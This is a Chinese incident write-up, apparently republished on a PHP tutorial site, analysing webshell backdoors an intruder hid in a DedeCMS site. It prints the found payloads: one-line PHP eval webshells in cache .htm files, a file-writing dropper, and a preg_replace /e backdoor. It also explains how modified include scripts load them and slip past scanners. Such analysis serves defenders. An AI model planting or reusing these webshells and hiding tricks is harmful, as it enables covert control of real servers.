>php教程 >php手册 >一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)

一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)

WBOY
WBOY원래의
2016-06-06 19:40:321568검색

单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun. 为了还原黑阔入侵的手法,用哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢? 无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc 文件 , 文件

单位某站用的dedecms,今天被某黑阔getshell了,提交到了wooyun.

为了还原黑阔入侵的手法,用鬼哥的getshell测试居然没成功, 是不是getshell过一次,再次就不会成功呢?

无奈只能打包代码,用各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件文件代码如下:

1 {dede:php}file_put_contents(’90sec.php’,'’);{/dede:php}

 

但是翻遍所有的Web目录也没有找到90sec.php文件,有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫,还是没找到。

最后老大翻到data/cache目录下发现了几个htm文件,myad-1.htm,myad-16.htm,mytag-1208.htm等,打开这些html文件,代码分别如下:

<p> </p> <table> <tbody> <tr> <td><code>2  

3 document.write(“dedecmsisok<strong>?php@</strong>eval($_POST[cmd]);?>”);
4 –>
 

 

<br>

1  

   

  document.write(“axxxxx’);echo‘OK’;@fclose($fp);?>”);

4  

  –>

 

 

<p> </p> <table> <tbody> <tr> <td><code>2  

3 document.write(“<strong>?php</strong>$fp =@fopen(‘av.php’, ‘a’);@fwrite($fp,‘<strong>?php</strong> eval($_POST[110])?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

4  
5 –>

  <p> </p> <table> <tbody> <tr> <td><code>2 document.write(“<strong>?php</strong>echo ‘dedecms 5.70day<br>guige,90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);
3 –>

看到这几个文件很奇怪,不知道黑阔要干嘛??虽然代码看似很熟悉,但是HTML文件能当后门用么?想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节,最终翻到plus/mytag_js.php文件,在这个文件里终于发现黑阔无节操的地方,主要代码如下:

一种奇特的DEDE隐藏后门办法(dedecms漏洞90sec.php文件)

看到上面的代码我们应该知道黑阔是多么的邪恶,在生成的htm格式的cache文件中写入各种类型的一句话代码,然后再修改plus/ad_js.php和mytag_js.php文件,包含htm格式的cache文件。这样黑阔只需要在菜刀中填入以下URL就可以连接一句话了.

http://www.ji-nuo.com /plus/mytag_js.php?id=1208

http://www.ji-nuo.com /plus/ad_js.php?id=1

具体的id以及文件名跟data/cache目录下的myad-1.htm,mytag-1208.htm是有关系的。因此各种webshell扫描器都没有扫到webshell后门文件,因为很多默认都不对htm进行扫描.

不怎么懂php,所以分析可能有差错的地方,欢迎指正!更多请关注:济宁网站建设

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.